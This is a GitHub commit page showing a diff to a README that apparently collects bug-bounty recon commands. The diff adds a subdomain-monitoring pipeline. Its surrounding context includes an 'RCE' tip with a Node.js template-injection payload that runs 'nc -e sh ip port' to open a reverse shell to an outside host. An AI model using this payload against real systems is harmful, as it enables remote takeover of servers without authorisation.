Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
rbih-boulanouar authored Jun 8, 2024
1 parent 8d680a3 commit 4181746
Showing 1 changed file with 4 additions and 0 deletions.
4 changes: 4 additions & 0 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -54,6 +54,10 @@ cat urls.txt | grep ".json$" > jsonfiles.txt
cat urls.txt | grep ".js$" > jsfiles.txt
cat urls.txt | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' > asphpfiles.txt
```
7-get new registred subdomains
```
gungnir -r domain.txt | anew subdomains.txt | notify -v
```
# RCE
1-If you discover a node.js template area, you should try triggerable node payload </br>
`require('child_process').exec('nc -e sh ip port');{src:/bin/sh/}`
Expand Down

0 comments on commit 4181746

Please sign in to comment.